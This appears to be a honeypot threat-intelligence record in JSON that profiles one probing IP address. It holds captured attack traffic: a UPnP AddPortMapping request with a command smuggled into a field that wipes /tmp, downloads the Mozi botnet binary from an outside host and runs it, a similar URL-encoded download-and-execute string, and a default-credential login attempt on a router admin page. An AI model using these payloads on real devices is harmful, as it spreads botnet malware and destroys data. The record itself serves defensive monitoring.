{"ip":"223.123.43.68","total_events":3,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":null},"first_seen":"2026-05-05T06:08:32","last_seen":"2026-06-18T07:28:41","events_24h":0,"events_7d":1,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Punjab","city":"","lat":31.558,"lon":74.3587,"asn":138423,"org":"CMPak Limited"},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[],"top_ports":[{"port":8080,"proto":"tcp","label":"HTTP-alt","count":2},{"port":49152,"proto":"tcp","label":"","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000","po11nn0700_4784ccc9db2c"]},"fingerprint_peers":{"ge10nn0000_000000000000":2189,"po11nn0700_4784ccc9db2c":496},"user_agents":["Hello, World"],"timeline":[{"date":"2026-05-05","count":2},{"date":"2026-06-18","count":1}],"recent_events":[{"timestamp":"2026-06-18T07:28:41","port":49152,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"630\",\"host\":\"<HONEYPOT>:49152\",\"soapaction\":\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\",\"user-agent\":\"Hello, World\"}","body":"<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://223.123.43.68:54638/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/soap.cgi?service=WANIPConn1","summary":"","payload_hex":"504f5354202f736f61702e6367693f736572766963653d57414e4950436f6e6e3120485454502f312e310d0a486f73743a20<HONEYPOT>3a34393135320d0a436f6e74656e742d4c656e6774683a203633300d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a534f4150416374696f6e3a2075726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e4950436f6e6e656374696f6e3a3123416464506f72744d617070696e670d0a4163636570743a202a2f2a0d0a557365722d4167656e743a2048656c6c6f2c20576f726c640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a3c3f786d6c2076657273696f6e3d22312e3022203f3e3c733a456e76656c6f706520786d6c6e733a733d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220733a656e636f64696e675374796c653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f223e3c534f41502d454e563a426f64793e3c6d3a416464506f72744d617070696e6720786d6c6e733a6d3d2275726e3a736368656d61732d75706e702d6f72673a736572766963653a57414e4950436f6e6e656374696f6e3a31223e3c4e6577506f72744d617070696e674465736372697074696f6e3e3c4e6577506f72744d617070696e674465736372697074696f6e3e3c4e65774c656173654475726174696f6e3e3c2f4e65774c656173654475726174696f6e3e3c4e6577496e7465726e616c436c69656e743e606364202f746d703b726d202d7266202a3b7767657420687474703a2f2f3232332e3132332e34332e36383a35343633382f4d6f7a692e6d3b2f746d702f4d6f7a692e6d20646c696e6b603c2f4e6577496e7465726e616c436c69656e743e3c4e6577456e61626c65643e313c2f4e6577456e61626c65643e3c4e657745787465726e616c506f72743e3633343c2f4e657745787465726e616c506f72743e3c4e657752656d6f7465486f73743e3c2f4e657752656d6f7465486f73743e3c4e657750726f746f636f6c3e5443503c2f4e657750726f746f636f6c3e3c4e6577496e7465726e616c506f72743e34353c2f4e6577496e7465726e616c506f72743e3c2f6d3a416464506f72744d617070696e673e3c534f4150454e563a426f64793e3c534f4150454e563a656e76656c6f70653e0d0a0d0a","method":"POST","user_agent":"Hello, World","community_id":"1:06cCTMTD/D9Ed0LTekrImxS/JQk=","ja3":"","session":"ef6b8ca5-8658-4bf8-b28e-6f5d64197861","seq":1,"duration_ms":100,"bytes_in":921,"bytes_out":78},{"timestamp":"2026-05-05T06:08:32","port":8080,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/tmp/Netlink.m&waninf=1_INTERNET_R_VID_154 HTTP/1.0\r\n\r\n","payload_hex":"3230687474703a2f2f25733a25642f4d6f7a692e6d2532302d4f2532302d3e2532302f746d702f4e65746c696e6b2e6d3b63686d6f642532303737372532302f746d702f4e65746c696e6b2e6d3b2f746d702f4e65746c696e6b2e6d2677616e696e663d315f494e5445524e45545f525f5649445f31353420485454502f312e300d0a0d0a","method":"","user_agent":"","community_id":"1:LXEESeOUhO0+mc1LL1C8NFYHgLo=","ja3":"","session":"797a4b1c-6665-405f-a011-6e5cc87b7f44","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0,"enriched":{"digest":"69dda84fbae568b6","strings":["20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/t…"],"iocs":{"urls":["http://%s:%d/Mozi.m%20-O%20-"],"paths":["/tmp/Netlink.m"]}}},{"timestamp":"2026-05-05T06:08:32","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/boaform/admin/formLogin?username=user&psd=user","summary":"","payload_hex":"474554202f626f61666f726d2f61646d696e2f666f726d4c6f67696e3f757365726e616d653d75736572267073643d7573657220485454502f312e300d0a0d0a","method":"GET","user_agent":"","community_id":"1:LXEESeOUhO0+mc1LL1C8NFYHgLo=","ja3":"","session":"797a4b1c-6665-405f-a011-6e5cc87b7f44","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0}],"http_methods":[{"method":"GET","count":1},{"method":"POST","count":1}],"distinct_ports_total":2,"top_paths":[{"path":"/soap.cgi?service=WANIPConn1","count":1,"ports":1},{"path":"/boaform/admin/formLogin?username=user&psd=user","count":1,"ports":1}],"distinct_paths_total":2,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Host","Soapaction","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"630","notable":false},{"name":"Host","value":"<HONEYPOT>:49152","notable":false},{"name":"Soapaction","value":"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping","notable":false},{"name":"User-Agent","value":"Hello, World","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[],"data_as_of":"2026-06-20T02:17:12.418913+00:00"}